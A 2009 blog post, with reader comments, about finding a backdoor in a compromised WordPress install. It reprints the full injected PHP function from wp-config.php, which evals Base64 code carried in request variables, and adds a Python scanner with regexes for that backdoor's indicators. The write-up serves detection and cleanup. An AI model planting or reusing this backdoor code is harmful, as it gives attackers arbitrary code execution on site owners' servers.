Well, an update worth its salt
September 2nd, 2009 | by Sean
(turns out I have something technical to blog about, after all.)
Well, I haven’t played with WordPress for a while and it turns out I was a few point-releases back. But, I digress.
When I was writing the last post, I noticed that there was some funny syntax at the end of the Permalink. Actually, it said something like base64_encode and $_SERVER["HTTP_EXECCODE"]. For some reason, I saw these and ignored them (in fact, I mentally chalked them up to a weirdness in Safari on Snow Leopard).
I had a bit of dinner, then my brain turned on. I was looking at PHP that got included inline into markup; this was not a browser bug.
After some investigation, I found a spurious new function added to my wp-config.php (below). This, combined with the update to my Permalink format, suggested server (or application) compromise. The offending code (pretty-printed for readability):
function gpc_4663($l4665) {
    if (is_array($l4665)) {
        // Recurse into nested arrays so every string value gets visited.
        foreach ($l4665 as $l4663 => $l4664)
            $l4665[$l4663] = gpc_4663($l4664);
    } else if (is_string($l4665) && substr($l4665, 0, 4) == "____") {
        // Any string value beginning with "____" is treated as Base64-encoded
        // PHP and executed; the value is then blanked so nothing is left behind.
        eval(base64_decode(substr($l4665, 4)));
        $l4665 = null;
    }
    return $l4665;
}
if (empty($_SERVER))
    $_SERVER = $HTTP_SERVER_VARS;
// Walks every server variable on each request; request headers land here
// as HTTP_* entries, which is where HTTP_EXECCODE comes from.
array_map("gpc_4663", $_SERVER);
Arbitrary code injection — through a query parameter, no less. Someone could simply go to any page including this file (which is any database-accessing page) and add a Base64-encoded string with code for the PHP interpreter to execute. Great.
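A small scanner for the indicators in the injected function above (the `eval(base64_decode(` call, the numbered `gpc_` function, the `"____"` prefix check and the `array_map` over `$_SERVER`), as an added example and not code from the original post; the two sample files are constructed inline so the script runs offline, and in practice you would feed it the contents of every .php file under the WordPress root.

```python
import re
from typing import Dict, List, Tuple

# Indicators taken from the backdoor function shown in the post.
INDICATORS = [
    ("eval-of-base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(")),
    ("numbered-gpc-function", re.compile(r"function\s+gpc_\d+\s*\(")),
    ("magic-prefix-check", re.compile(r'substr\s*\([^)]*\)\s*==\s*"____"')),
    ("server-array-walk",
     re.compile(r"array_map\s*\(\s*['\"]gpc_\d+['\"]\s*,\s*\$_SERVER")),
]

def scan_source(name: str, source: str) -> List[Tuple[str, str, int]]:
    """Return (file, indicator, line_number) for every hit in one file's text."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((name, label, lineno))
    return hits

def scan_tree(files: Dict[str, str]) -> List[Tuple[str, str, int]]:
    """Scan a mapping of path -> contents (read from disk in real use)."""
    hits = []
    for name, source in sorted(files.items()):
        hits.extend(scan_source(name, source))
    return hits

# Constructed samples: one config carrying the backdoor, one clean file.
SAMPLE_FILES = {
    "wp-config.php": """<?php
define('DB_NAME', 'blog');
function gpc_4663($l4665) {
  if (is_string($l4665) && substr($l4665,0,4)=="____") {
    eval(base64_decode(substr($l4665,4)));
  }
  return $l4665;
}
array_map("gpc_4663",$_SERVER);
""",
    # A lone base64_decode() is legitimate and must not trigger on its own.
    "wp-settings.php": "<?php\n$x = base64_decode($y);\n",
}

if __name__ == "__main__":
    for name, label, lineno in scan_tree(SAMPLE_FILES):
        print(f"{name}:{lineno}: {label}")
```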
I think the worst thing about this compromise is that I have no idea how the attacker did it.
As I said before, I was a few point releases behind on my WordPress installation. Unfortunately, if this was a known attack, I have no way of knowing it. The folks over at WordPress are seemingly tight-lipped as to the nature of their security updates, so if you’ve been compromised along a vector they’ve since fixed, you’re in the dark. Now I’m just wondering if I still have a big open hole in my WordPress installation.
As for the loss of data, my post-incident analysis reveals that the compromiser got nothing. Whew.
Oh well. If you run WordPress, check your installs.
6 Responses to “Well, an update worth its salt”
By passer-by on Sep 4, 2009
Hi Sean,
I too have been hit by this, on the 2nd Sept 2009.
I’m a bit stunned as like yourself I have no idea how this person has done it. Kudos to the little punk.
I am beginning to think it's a WP exploit. I have a part of my website served up from a private area; none of the files there were affected. Everything affected has been in the root WordPress directory. I am using WP 2.6. Maybe time to upgrade.
By benanne on Sep 4, 2009
I was running v2.6.3, and the same thing happened to me. At least, the permalink setting was changed. I haven’t found any injected code. To get rid of it, I fixed the permalink setting, but that turned out to be insufficient; closer inspection of my database revealed that there was somehow another user with administrator rights (I’m supposed to be the only one), and his username was set to a bunch of JavaScript. Upon discovering this, I manually removed all references to this user from the database (because he wouldn’t show up in the WP admin pages) and upgraded to 2.8.4. I hope that does it, but I’m not sure yet.
I just thought I’d mention it here, because you don’t say anything about suspicious administrator users, so it’s possible that that’s something you have overlooked. Also, there seems to have been an outbreak of this lately, wordpress.org’s support forums are swarming with people reporting the same symptoms.
By Sean on Sep 5, 2009
It looks like there are more details (but not many more): http://mashable.com/2009/09/05/wordpress-attack/
By vladimir on Sep 7, 2009
I think it is not the WordPress vulnerability issue. Look at this thread
http://www.webdeveloper.com/forum/showthread.php?p=1032611
A lot of non-PHP, clean HTML sites were infected with this gpc_() in the same manner. It is more probable that it uses compromised FTP passwords which were stolen from your desktop by some virus which infected your computer.